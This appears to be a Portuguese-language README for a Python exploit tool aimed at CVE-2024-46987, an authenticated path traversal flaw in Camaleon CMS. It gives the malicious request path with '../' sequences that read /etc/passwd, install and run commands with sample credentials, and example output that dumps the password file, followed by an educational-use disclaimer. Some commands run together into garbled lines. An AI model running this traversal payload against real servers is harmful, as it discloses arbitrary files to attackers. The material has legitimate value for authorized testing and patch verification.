
Exploit criado usando Python
A vulnerabilidade CVE-2024-46987 é uma vulnerabilidade de path traversal autenticada (CWE-22) no Camaleon CMS (um sistema de gerenciamento de conteúdo baseado em Ruby on Rails). Ela permite que um usuário logado (mesmo com privilégios baixos) leia arquivos arbitrários no servidor por meio da ação MediaController#download_private_file.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:NUm atacante com credenciais válidas pode enviar uma solicitação maliciosa para: /admin/media/download_private_file?file=../../../../etc/passwd
pip install -r requirements.txtOU
pip install -r requests firepython cms-exploit.py \
--url http://target.local \
--username neal \
--password 'Caffery@123' \
--cmd /etc/passwd
[+] Login successful
[*] Requesting: http://target.local/admin/media/download_private_file?file=../../../etc/passwd
[+] Success – content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
.
.
Nota: O script assume um formulário de login no estilo Rails (user[email], user[password], authenticity_token). Ajuste os campos do payload se o seu alvo usar nomes personalizados.
Esta ferramenta é fornecida apenas para fins educacionais e de testes de segurança autorizados.
Use apenas em sistemas que você possui ou para os quais tem permissão explícita por escrito para testar (ex.: programas de bug bounty, pentests internos, laboratórios como HTB). O uso não autorizado pode violar leis. O autor não é responsável pelo uso indevido.